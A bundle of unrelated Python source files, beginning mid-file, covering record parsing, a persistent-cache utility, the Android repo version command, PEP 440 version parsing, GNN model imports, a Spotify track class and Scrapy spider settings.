raise AttributeError("%s is a required item" % (item,))
try:
super(GenericRecord, self).__delitem__(item)
except KeyError:
pass
def copy(self):
"""Coerces copy to correct type"""
temp = self.__class__(super(GenericRecord, self).copy())
# don't forget to copy attributes!
for attr, val in viewitems(self.__dict__):
temp.__dict__[attr] = deepcopy(val)
return temp
class MappedRecord(GenericRecord):
"""GenericRecord that maps names of fields onto standardized names.
Override Aliases in subclass for new mapping of OldName->NewName. Each
OldName can have only one NewName, but it's OK if several OldNames map
to the same NewName.
Note: can access fields either as items or as attributes. In addition,
can access either using nonstandard names or using standard names.
Implementation note: currently, just a dict with appropriate get/set
overrides and ability to access items as attributes. Attribute access
is about 10x slower than in GenericRecord, so make sure you need the
additional capabilities if you use MappedRecord instead of GenericRecord.
WARNING: MappedRecord pretends to have every attribute, so will never raise
AttributeError when trying to find an unknown attribute. This feature can
cause surprising interactions when a Delegator is delegating its
attributes to a MappedRecord, since any attributes defined in __init__ will
be set in the MappedRecord and not in the object itself. The solution is
to use the self.__dict__['AttributeName'] = foo syntax to force the
attributes to be set in the object and not the MappedRecord to which it
forwards.
"""
Aliases = {}
DefaultValue = None
def _copy(self, prototype):
"""Returns a copy of item."""
if hasattr(prototype, 'copy'):
return prototype.copy()
elif isinstance(prototype, list):
return prototype[:]
elif (isinstance(prototype, str) or isinstance(prototype, int) or
isinstance(prototype, tuple) or isinstance(prototype, complex) or
prototype is None):
return prototype # immutable type: use directly
else:
return deepcopy(prototype)
def __init__(self, *args, **kwargs):
"""Reads kwargs as properties of self."""
# perform init on temp dict to preserve interface: will then translate
# aliased keys when loading into self
temp = {}
unalias = self.unalias
dict.__init__(temp, *args, **kwargs)
for key, val in viewitems(temp):
self[unalias(key)] = val
for name, prototype in viewitems(self.Required):
new_name = unalias(name)
if new_name not in self:
self[new_name] = self._copy(prototype)
def unalias(self, key):
"""Returns dealiased name for key, or key if not in alias."""
try:
return self.Aliases.get(key, key)
except TypeError:
return key
def __getattr__(self, attr):
"""Returns None if field is absent, rather than raising exception."""
if attr in self:
return self[attr]
elif attr in self.__dict__:
return self.__dict__[attr]
elif attr.startswith('__'): # don't retrieve private class attrs
raise AttributeError
elif hasattr(self.__class__, attr):
return getattr(self.__class__, attr)
else:
return self._copy(self.DefaultValue)
def __setattr__(self, attr, value):
"""Sets attribute in self if absent, converting name if necessary."""
normal_attr = self.unalias(attr)
# we overrode __getattr__, so have to simulate getattr(self, attr) by
# calling superclass method and checking for AttributeError.
# BEWARE: dict defines __getattribute__, not __getattr__!
try:
super(MappedRecord, self).__getattribute__(normal_attr)
super(MappedRecord, self).__setattr__(normal_attr, value)
except AttributeError:
self[normal_attr] = value
def __delattr__(self, attr):
"""Deletes attribute, converting name if necessary. Fails silently."""
normal_attr = self.unalias(attr)
if normal_attr in self.Required:
raise AttributeError("%s is a required attribute" % (attr,))
else:
try:
super(MappedRecord, self).__delattr__(normal_attr)
except AttributeError:
del self[normal_attr]
def __getitem__(self, item):
"""Returns default if item is absent, rather than raising exception."""
normal_item = self.unalias(item)
return self.get(normal_item, self._copy(self.DefaultValue))
def __setitem__(self, item, val):
"""Sets item, converting name if necessary."""
super(MappedRecord, self).__setitem__(self.unalias(item), val)
def __delitem__(self, item):
"""Deletes item, converting name if necessary. Fails silently."""
normal_item = self.unalias(item)
super(MappedRecord, self).__delitem__(normal_item)
def __contains__(self, item):
"""Tests membership, converting name if necessary."""
return super(MappedRecord, self).__contains__(self.unalias(item))
def get(self, item, default):
"""Returns self[item] or default if not present. Silent on unhashable.
"""
try:
return super(MappedRecord, self).get(self.unalias(item), default)
except TypeError:
return default
def setdefault(self, key, default=None):
"""Returns self[key] or default (and sets self[key]=default)"""
return super(MappedRecord, self).setdefault(self.unalias(key), default)
def update(self, *args, **kwargs):
"""Updates self with items in other"""
temp = {}
unalias = self.unalias
temp.update(*args, **kwargs)
for key, val in viewitems(temp):
self[unalias(key)] = val
# The following methods are useful for handling particular types of fields in
# line-oriented parsers
def TypeSetter(constructor=None):
"""Returns function that takes obj, field, val and sets obj.field = val.
constructor can be any callable that returns an object.
"""
if constructor:
def setter(obj, field, val):
setattr(obj, field, constructor(val))
else:
def setter(obj, field, val):
setattr(obj, field, val)
return setter
int_setter = TypeSetter(int)
str_setter = TypeSetter(str)
list_setter = TypeSetter(list)
tuple_setter = TypeSetter(tuple)
dict_setter = TypeSetter(dict)
float_setter = TypeSetter(float)
complex_setter = TypeSetter(complex)
bool_setter = TypeSetter(bool)
identity_setter = TypeSetter()
def list_adder(obj, field, val):
"""Adds val to list in obj.field, creating list if necessary."""
try:
getattr(obj, field).append(val)
except AttributeError:
setattr(obj, field, [val])
def dict_adder(obj, field, val):
"""If val is a sequence, adds key/value pair in obj.field: else adds key.
"""
try:
key, value = val
except (ValueError, TypeError):
key, value = val, None
try:
getattr(obj, field)[key] = value
except AttributeError:
setattr(obj, field, {key: value})
class LineOrientedConstructor(object):
"""Constructs a MappedRecord from a sequence of lines."""
def __init__(self, Lines=None, LabelSplitter=space_pairs, FieldMap=None,
Constructor=MappedRecord, Strict=False):
"""Returns new LineOrientedConstructor.
Fields:
Lines: set of lines to construct record from (for convenience).
Default is None.
LabelSplitter: function that returns (label, data) tuple.
Default is to split on first space and strip components.
FieldMap: dict of {fieldname:handler} functions. Each function
has the signature (obj, field, val) and performs an inplace
action like setting field to val or appending val to field.
Default is empty dict.
Constructor: constructor for the resulting object.
Default is MappedRecord: beware of using constructors that don't
subclass MappedRecord.
Strict: boolean controlling whether to raise error on unrecognized
field. Default is False.
"""
self.Lines = Lines or []
self.LabelSplitter = LabelSplitter
self.FieldMap = FieldMap or {}
self.Constructor = Constructor
self.Strict = Strict
def __call__(self, Lines=None):
"""Returns the record constructed from Lines, or self.Lines"""
if Lines is None:
Lines = self.Lines
result = self.Constructor()
fieldmap = self.FieldMap
aka = result.unalias
splitter = self.LabelSplitter
for line in Lines:
# find out how many items we got, setting key and val appropiately
items = list(splitter(line))
num_items = len(items)
if num_items == 2: # typical case: key-value pair
raw_field, val = items
elif num_items > 2:
raw_field = items[0]
val = items[1:]
elif len(items) == 1:
raw_field, val = items[0], None
elif not items: # presumably had line with just a delimiter?
continue
# figure out if we know the field under its original name or as
# an alias
if raw_field in fieldmap:
field, mapper = raw_field, fieldmap[raw_field]
else:
new_field = aka(raw_field)
if new_field in fieldmap:
field, mapper = new_field, fieldmap[new_field]
else:
if self.Strict:
raise FieldError(
"Got unrecognized field %s" %
(raw_field,))
else:
identity_setter(result, raw_field, val)
continue
# if we found the field in the fieldmap, apply the correct function
try:
mapper(result, field, val)
except: # Warning: this is a catchall for _any_ exception,
# and may mask what's actually going wrong.
if self.Strict:
raise FieldError("Could not handle line %s" % (line,))
return result
def FieldWrapper(fields, splitter=None, constructor=None):
"""Returns dict containing field->val mapping, one level.
fields should be list of fields, in order.
splitter should be something like a DelimitedSplitter that converts the
line into a sequence of fields.
constructor is a callable applied to the dict after construction.
Call result on a _single_ line, not a list of lines.
Note that the constructor should take a dict and return an object of some
useful type. Additionally, it is the _constructor's_ responsibility to
complain if there are not enough fields, since zip will silently truncate
at the shorter sequence. This is actually useful in the case where many of
the later fields are optional.
"""
if splitter is None:
splitter = DelimitedSplitter(None, None)
if constructor:
def parser(line):
return constructor(dict(zip(fields, splitter(line))))
else:
def parser(line):
return dict(zip(fields, splitter(line)))
return parser
def StrictFieldWrapper(fields, splitter=None, constructor=None):
"""Returns dict containing field->val mapping, one level.
fields should be list of fields, in order.
splitter should be something like a DelimitedSplitter that converts the
line into a sequence of fields.
constructor is a callable applied to the dict after construction.
Call result on a _single_ line, not a list of lines.
Note that the constructor should take a dict and return an object of some
useful type. Raises RecordError if the wrong number of fields are returned
from the split.
"""
if splitter is None:
splitter = DelimitedSplitter(None, None)
if constructor:
def parser(line):
items = splitter(line)
if len(items) != len(fields):
raise FieldError("Expected %s items but got %s: %s" %
(len(fields), len(items), items))
return constructor(dict(zip(fields, items)))
else:
def parser(line):
items = splitter(line)
if len(items) != len(fields):
raise FieldError("Expected %s items but got %s: %s" %
(len(fields), len(items), items))
return dict(zip(fields, items))
return parser
def raise_unknown_field(field, data):
"""Raises a FieldError, displaying the offending field and data."""
raise FieldError("Got unknown field %s with data %s" % (field, data))
class FieldMorpher(object):
"""When called, applies appropriate constructors to each value of dict.
Initialize using a dict of fieldname:constructor pairs.
"""
def __init__(self, Constructors, Default=raise_unknown_field):
"""Returns a new FieldMorpher, using appropriate constructors.
If a field is unknown, will try to set key and value to the results
of Default(key, value): in other words, the signature of Default should
take a key and a value and should return a key and a value. The
built-in value of Default raises a FieldError instead, but it will
often be useful to do things like return the key/value pair unchanged,
or to strip the key and the value and then add them.
"""
self.Constructors = Constructors
self.Default = Default
def __call__(self, data):
"""Returns a new dict containing information converted from data."""
result = {}
default = self.Default
cons = self.Constructors
for key, val in viewitems(data):
if key in cons:
result[key] = cons[key](val)
else:
new_key, new_val = default(key, val)
# if we now recognize the key, use its constructor on the old
# val
if new_key in cons:
result[new_key] = cons[new_key](val)
# otherwise, enter the new key and the new val
else:
result[new_key] = new_val
return result
|
import datetime
import functools
import inspect
import json
import logging
import os
from typing import Callable, Dict, Optional
import async_lru
import gamla
import redis
from cloud_utils.cache import file_store, redis_utils
_RESULT_HASH_KEY = "result_hash"
_LAST_RUN_TIMESTAMP = "last_run_timestamp"
class VersionNotFound(Exception):
pass
@gamla.curry
def _write_to_cache_file(
cache_file_name: str,
identifier: str,
extra_fields: Dict,
hash_to_load: str,
):
cache_file = file_store.open_file("r+")(cache_file_name)
new_versions_dict = gamla.pipe(
cache_file,
json.load,
gamla.add_key_value(
identifier,
{
_RESULT_HASH_KEY: hash_to_load,
_LAST_RUN_TIMESTAMP: datetime.datetime.now().isoformat(),
**extra_fields,
},
),
dict.items,
sorted,
dict,
)
cache_file.seek(0)
json.dump(new_versions_dict, cache_file, indent=2)
cache_file.write("\n")
cache_file.truncate()
def _time_since_last_updated(
identifier: str,
) -> Callable[[Dict], Optional[datetime.timedelta]]:
return gamla.compose_left(
gamla.get_in_or_none([identifier, _LAST_RUN_TIMESTAMP]),
gamla.unless(
gamla.equals(None),
gamla.compose_left(
datetime.datetime.fromisoformat,
lambda last_updated: datetime.datetime.now() - last_updated,
),
),
)
_total_hours_since_update = gamla.ternary(
gamla.equals(None),
gamla.just(0),
gamla.compose_left(lambda time_span: time_span.total_seconds() / 3600, round),
)
def _get_cache_filename(
cache_file_name: str,
factory: Callable,
) -> str:
cache_file = os.path.join(
os.path.dirname(factory.__code__.co_filename),
cache_file_name,
)
if not os.path.isfile(cache_file):
with open(cache_file, "w") as f:
f.write("{}\n")
return cache_file
def auto_updating_cache(
factory: Callable,
cache_file_name: str,
save_local: bool,
bucket_name: str,
should_update: Callable[[Optional[datetime.timedelta]], bool],
) -> Callable:
cache_file = _get_cache_filename(cache_file_name, factory)
extra_fields = {
"filename": os.path.basename(factory.__code__.co_filename),
"lineno": factory.__code__.co_firstlineno,
}
identifier = gamla.function_to_uid(factory)
return gamla.compose_left(
gamla.just(cache_file),
file_store.open_file("r"),
json.load,
gamla.side_effect(
gamla.compose_left(
_time_since_last_updated(identifier),
_total_hours_since_update,
lambda hours_since_last_update: f"Loading cache for [{identifier}]. Last updated {hours_since_last_update} hours ago.",
logging.info,
),
),
gamla.ternary(
gamla.compose_left(_time_since_last_updated(identifier), should_update),
gamla.compose_left(
gamla.ignore_input(factory),
file_store.save_to_bucket_return_hash(save_local, bucket_name),
gamla.side_effect(
_write_to_cache_file(
cache_file,
identifier,
extra_fields,
),
),
gamla.log_text(f"Finished updating cache for [{identifier}]."),
),
gamla.get_in([identifier, _RESULT_HASH_KEY]),
),
)
def persistent_cache(
redis_client: redis.Redis,
name: str,
environment: str,
is_external: bool,
num_misses_to_trigger_sync: int,
) -> Callable:
maxsize = 10_000
def simple_decorator(func):
if inspect.iscoroutinefunction(func):
return async_lru.alru_cache(maxsize=maxsize)(func)
return functools.lru_cache(maxsize=maxsize)(func)
if not is_external and environment in ("production", "staging", "development"):
return simple_decorator
if environment in ("production", "staging", "development"):
get_cache_item, set_cache_item = redis_utils.make_redis_store(
redis_client,
environment,
name,
)
else:
get_cache_item, set_cache_item = file_store.make_file_store(
name,
num_misses_to_trigger_sync,
)
def decorator(func):
@functools.wraps(func)
async def wrapper_async(*args, **kwargs):
key = gamla.make_call_key(args, kwargs)
try:
return get_cache_item(key)
except KeyError:
result = await func(*args, **kwargs)
set_cache_item(key, result)
return result
@functools.wraps(func)
def wrapper(*args, **kwargs):
key = gamla.make_call_key(args, kwargs)
try:
return get_cache_item(key)
except KeyError:
result = func(*args, **kwargs)
set_cache_item(key, result)
return result
if inspect.iscoroutinefunction(func):
return wrapper_async
return wrapper
return decorator
|
#
# Copyright (C) 2009 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from command import Command, MirrorSafeCommand
from git_command import git
from project import HEAD
class Version(Command, MirrorSafeCommand):
wrapper_version = None
wrapper_path = None
common = False
helpSummary = "Display the version of repo"
helpUsage = """
%prog
"""
def Execute(self, opt, args):
rp = self.manifest.repoProject
rem = rp.GetRemote(rp.remote.name)
print 'repo version %s' % rp.work_git.describe(HEAD)
print ' (from %s)' % rem.url
if Version.wrapper_path is not None:
print 'repo launcher version %s' % Version.wrapper_version
print ' (from %s)' % Version.wrapper_path
print git.version().strip()
print 'Python %s' % sys.version
|
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import collections
import itertools
import re
from ._structures import Infinity
__all__ = [
"parse", "Version", "LegacyVersion", "InvalidVersion", "VERSION_PATTERN"
]
_Version = collections.namedtuple(
"_Version",
["epoch", "release", "dev", "pre", "post", "local"],
)
def parse(version):
"""
Parse the given version string and return either a :class:`Version` object
or a :class:`LegacyVersion` object depending on if the given version is
a valid PEP 440 version or a legacy version.
"""
try:
return Version(version)
except InvalidVersion:
return LegacyVersion(version)
class InvalidVersion(ValueError):
"""
An invalid version was found, users should refer to PEP 440.
"""
class _BaseVersion(object):
def __hash__(self):
return hash(self._key)
def __lt__(self, other):
return self._compare(other, lambda s, o: s < o)
def __le__(self, other):
return self._compare(other, lambda s, o: s <= o)
def __eq__(self, other):
return self._compare(other, lambda s, o: s == o)
def __ge__(self, other):
return self._compare(other, lambda s, o: s >= o)
def __gt__(self, other):
return self._compare(other, lambda s, o: s > o)
def __ne__(self, other):
return self._compare(other, lambda s, o: s != o)
def _compare(self, other, method):
if not isinstance(other, _BaseVersion):
return NotImplemented
return method(self._key, other._key)
class LegacyVersion(_BaseVersion):
def __init__(self, version):
self._version = str(version)
self._key = _legacy_cmpkey(self._version)
def __str__(self):
return self._version
def __repr__(self):
return "<LegacyVersion({})>".format(repr(str(self)))
@property
def public(self):
return self._version
@property
def base_version(self):
return self._version
@property
def local(self):
return None
@property
def is_prerelease(self):
return False
@property
def is_postrelease(self):
return False
_legacy_version_component_re = re.compile(
r"(\d+ | [a-z]+ | \.| -)", re.VERBOSE,
)
_legacy_version_replacement_map = {
"pre": "c", "preview": "c", "-": "final-", "rc": "c", "dev": "@",
}
def _parse_version_parts(s):
for part in _legacy_version_component_re.split(s):
part = _legacy_version_replacement_map.get(part, part)
if not part or part == ".":
continue
if part[:1] in "0123456789":
# pad for numeric comparison
yield part.zfill(8)
else:
yield "*" + part
# ensure that alpha/beta/candidate are before final
yield "*final"
def _legacy_cmpkey(version):
# We hardcode an epoch of -1 here. A PEP 440 version can only have a epoch
# greater than or equal to 0. This will effectively put the LegacyVersion,
# which uses the defacto standard originally implemented by setuptools,
# as before all PEP 440 versions.
epoch = -1
# This scheme is taken from pkg_resources.parse_version setuptools prior to
# it's adoption of the packaging library.
parts = []
for part in _parse_version_parts(version.lower()):
if part.startswith("*"):
# remove "-" before a prerelease tag
if part < "*final":
while parts and parts[-1] == "*final-":
parts.pop()
# remove trailing zeros from each series of numeric parts
while parts and parts[-1] == "00000000":
parts.pop()
parts.append(part)
parts = tuple(parts)
return epoch, parts
# Deliberately not anchored to the start and end of the string, to make it
# easier for 3rd party code to reuse
VERSION_PATTERN = r"""
v?
(?:
(?:(?P<epoch>[0-9]+)!)? # epoch
(?P<release>[0-9]+(?:\.[0-9]+)*) # release segment
(?P<pre> # pre-release
[-_\.]?
(?P<pre_l>(a|b|c|rc|alpha|beta|pre|preview))
[-_\.]?
(?P<pre_n>[0-9]+)?
)?
(?P<post> # post release
(?:-(?P<post_n1>[0-9]+))
|
(?:
[-_\.]?
(?P<post_l>post|rev|r)
[-_\.]?
(?P<post_n2>[0-9]+)?
)
)?
(?P<dev> # dev release
[-_\.]?
(?P<dev_l>dev)
[-_\.]?
(?P<dev_n>[0-9]+)?
)?
)
(?:\+(?P<local>[a-z0-9]+(?:[-_\.][a-z0-9]+)*))? # local version
"""
class Version(_BaseVersion):
_regex = re.compile(
r"^\s*" + VERSION_PATTERN + r"\s*$",
re.VERBOSE | re.IGNORECASE,
)
def __init__(self, version):
# Validate the version and parse it into pieces
match = self._regex.search(version)
if not match:
raise InvalidVersion("Invalid version: '{}'".format(version))
# Store the parsed out pieces of the version
self._version = _Version(
epoch=int(match.group("epoch")) if match.group("epoch") else 0,
release=tuple(int(i) for i in match.group("release").split(".")),
pre=_parse_letter_version(
match.group("pre_l"),
match.group("pre_n"),
),
post=_parse_letter_version(
match.group("post_l"),
match.group("post_n1") or match.group("post_n2"),
),
dev=_parse_letter_version(
match.group("dev_l"),
match.group("dev_n"),
),
local=_parse_local_version(match.group("local")),
)
# Generate a key which will be used for sorting
self._key = _cmpkey(
self._version.epoch,
self._version.release,
self._version.pre,
self._version.post,
self._version.dev,
self._version.local,
)
def __repr__(self):
return "<Version({})>".format(repr(str(self)))
def __str__(self):
parts = []
# Epoch
if self._version.epoch != 0:
parts.append("{}!".format(self._version.epoch))
# Release segment
parts.append(".".join(str(x) for x in self._version.release))
# Pre-release
if self._version.pre is not None:
parts.append("".join(str(x) for x in self._version.pre))
# Post-release
if self._version.post is not None:
parts.append(".post{}".format(self._version.post[1]))
# Development release
if self._version.dev is not None:
parts.append(".dev{}".format(self._version.dev[1]))
# Local version segment
if self._version.local is not None:
parts.append(
"+{}".format(".".join(str(x) for x in self._version.local))
)
return "".join(parts)
@property
def public(self):
return str(self).split("+", 1)[0]
@property
def base_version(self):
parts = []
# Epoch
if self._version.epoch != 0:
parts.append("{}!".format(self._version.epoch))
# Release segment
parts.append(".".join(str(x) for x in self._version.release))
return "".join(parts)
@property
def local(self):
version_string = str(self)
if "+" in version_string:
return version_string.split("+", 1)[1]
@property
def is_prerelease(self):
return bool(self._version.dev or self._version.pre)
@property
def is_postrelease(self):
return bool(self._version.post)
def _parse_letter_version(letter, number):
if letter:
# We consider there to be an implicit 0 in a pre-release if there is
# not a numeral associated with it.
if number is None:
number = 0
# We normalize any letters to their lower case form
letter = letter.lower()
# We consider some words to be alternate spellings of other words and
# in those cases we want to normalize the spellings to our preferred
# spelling.
if letter == "alpha":
letter = "a"
elif letter == "beta":
letter = "b"
elif letter in ["c", "pre", "preview"]:
letter = "rc"
elif letter in ["rev", "r"]:
letter = "post"
return letter, int(number)
if not letter and number:
# We assume if we are given a number, but we are not given a letter
# then this is using the implicit post release syntax (e.g. 1.0-1)
letter = "post"
return letter, int(number)
_local_version_seperators = re.compile(r"[\._-]")
def _parse_local_version(local):
"""
Takes a string like abc.1.twelve and turns it into ("abc", 1, "twelve").
"""
if local is not None:
return tuple(
part.lower() if not part.isdigit() else int(part)
for part in _local_version_seperators.split(local)
)
def _cmpkey(epoch, release, pre, post, dev, local):
# When we compare a release version, we want to compare it with all of the
# trailing zeros removed. So we'll use a reverse the list, drop all the now
# leading zeros until we come to something non zero, then take the rest
# re-reverse it back into the correct order and make it a tuple and use
# that for our sorting key.
release = tuple(
reversed(list(
itertools.dropwhile(
lambda x: x == 0,
reversed(release),
)
))
)
# We need to "trick" the sorting algorithm to put 1.0.dev0 before 1.0a0.
# We'll do this by abusing the pre segment, but we _only_ want to do this
# if there is not a pre or a post segment. If we have one of those then
# the normal sorting rules will handle this case correctly.
if pre is None and post is None and dev is not None:
pre = -Infinity
# Versions without a pre-release (except as noted above) should sort after
# those with one.
elif pre is None:
pre = Infinity
# Versions without a post segment should sort before those with one.
if post is None:
post = -Infinity
# Versions without a development segment should sort after those with one.
if dev is None:
dev = Infinity
if local is None:
# Versions without a local segment should sort before those with one.
local = -Infinity
else:
# Versions with a local segment need that segment parsed to implement
# the sorting rules in PEP440.
# - Alpha numeric segments sort before numeric segments
# - Alpha numeric segments sort lexicographically
# - Numeric segments sort numerically
# - Shorter versions sort before longer versions when the prefixes
# match exactly
local = tuple(
(i, "") if isinstance(i, int) else (-Infinity, i)
for i in local
)
return epoch, release, pre, post, dev, local
|
from .compgcn import CompGCN, CompGCNLayer
from .dgi import DGI, DGIModel
from .disengcn import DisenGCN, DisenGCNLayer
from .gat import PetarVSpGAT, SpGraphAttentionLayer
from .gcn import GraphConvolution, TKipfGCN
from .gcnii import GCNIILayer, GCNII
from .gdc_gcn import GDC_GCN
from .grace import GRACE, GraceEncoder
from .graphsage import Graphsage, GraphSAGELayer
from .hgpsl import HGPSL, HGPSLPool
from .mvgrl import MVGRL
from .pairnorm import PairNorm
from .patchy_san import PatchySAN
from .ppnp import PPNP
from .pyg_cheb import Chebyshev
from .pyg_deepergcn import DeeperGCN, DeepGCNLayer
from .pyg_dgcnn import DGCNN
from .pyg_diffpool import DiffPool, BatchedDiffPool, BatchedDiffPoolLayer
from .pyg_drgat import DrGAT
from .pyg_drgcn import DrGCN
from .pyg_gcnmix import GCNMix
from .pyg_gin import GINLayer, GINMLP
from .pyg_grand import Grand
from .pyg_gpt_gnn import GPT_GNN
from .pyg_gtn import GTConv, GTLayer, GTN
from .pyg_han import HAN, HANLayer
from .pyg_infomax import Infomax
from .pyg_infograph import InfoGraph
from .pyg_sagpool import SAGPoolLayers, SAGPoolNetwork
from .pyg_sortpool import SortPool
from .pyg_srgcn import SRGCN
from .pyg_stpgnn import stpgnn
from .rgcn import RGCNLayer, LinkPredictRGCN, RGCN
from .sgc import SimpleGraphConvolution
|
from logging import exception
import sys, os
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from classes.downloader import Downloader
from scripts import setup
from typing import Dict
class Track:
'''Track informations and processing.'''
def __init__(self, track: Dict, track_id=None) -> None:
assert track != None or track_id != None, 'You must pass at least one parameter'
if track:
self.init_values(track)
elif track_id:
track = self.load_basic_song_data(track_id)
self.init_values(track)
else:
exception('Cannot initialize Track')
def init_values(self, track:Dict):
'''Initialize basic Track properties.'''
#init basic properties
self.id = track['id']
self.uri = track['uri']
self.external_url = track['external_urls']['spotify']
self.name = track['name']
self.artist_name = track['artists'][0]['name']
self.artist_id = track['artists'][0]['id']
self.album_name = track['album']['name']
self.album_id = track['album']['id']
#init aditional properties
self.audio_features = track['audio_features'] if 'audio_features' in track else None
def __str__(self) -> str:
return f'{self.artist_name} song \'{self.name}\' from album \'{self.album_name}\''
def __repr__(self) -> str:
return f'{self.artist_name} song \'{self.name}\' from album \'{self.album_name}\''
def get_id(self) -> int:
'''Get track id.'''
return self.id
def get_uri(self) -> str:
'''Get track uri.'''
return self.uri
def set_additional_info(self, features) -> None:
'''Set track additional audio features property.'''
self.audio_features = features
def convert_to_array_for_classification(self) -> list:
'''
Convert audio features to array ready to pass into classification method.
Return elementwise list of necessary properties.
'''
if not self.audio_features:
self.load_additional_song_data()
keys = ['danceability', 'energy', 'key', 'loudness', 'mode', 'speechiness','acousticness', 'instrumentalness', 'liveness', 'valence', 'tempo']
return [ self.audio_features[k] for k in keys ]
def load_additional_song_data(self, downloader=None) -> None:
'''Download and load song characteristics like loudness, energy, liveness etc.'''
if not downloader:
downloader= Downloader(setup.get_spotify_username())
self.audio_features = downloader.fetch_track_additional_info(self.id)
def load_basic_song_data(self, _id, downloader=None) -> Dict:
'''
Download track's basic data.
Return track in dictionary format.
'''
if not downloader:
downloader= Downloader(setup.get_spotify_username())
return downloader.fetch_track_by_id(_id)
def save(self, filename='', downloader=None) -> None:
'''Save track to file. By default files are named by artist and song name.'''
if filename == '':
filename = f'{self.artist_name}_{self.name}.json'
if not downloader:
downloader= Downloader(setup.get_spotify_username())
dic = dict()
try:
#get currently saved data
dic = downloader.read_json_from_file(filename)
except:
dic['id'] = self.id
dic['uri'] = self.uri
dic['external_url']= self.external_url
dic['name'] = self.name
dic['artist_name'] = self.artist_name
dic['artist_id'] = self.artist_id
dic['album_name']= self.album_name
dic['album_id'] = self.album_id
dic['audio_features'] = self.audio_features
#save
downloader.write_json_to_file(filename, dic)
if __name__ == '__main__':
d = Downloader(setup.get_spotify_username())
sonne = Track(d.read_json_from_file('sonne.json'))
sonne.load_additional_song_data(d)
sonne.save()
|
# -*- coding: utf-8 -*-
# Scrapy settings for news_comment_spider project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://doc.scrapy.org/en/latest/topics/settings.html
# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'news_comment_spider'
SPIDER_MODULES = ['news_comment_spider.spiders']
NEWSPIDER_MODULE = 'news_comment_spider.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'news_comment_spider (+http://www.yourdomain.com)'
USER_AGENT_LIST=[
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36'
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24"
]
import random
USER_AGENT = random.choice(USER_AGENT_LIST)
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'news_comment_spider.middlewares.NewsCommentSpiderSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'news_comment_spider.middlewares.NewsCommentSpiderDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
'news_comment_spider.pipelines.NewsCommentSpiderPipeline': 300,
'news_comment_spider.pipelines.SentimentCalculationPipeline': 400,
}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
|
import django
from fluent_pages.tests.testapp.models import WebShopPage
from fluent_pages.tests.utils import AppTestCase, override_settings
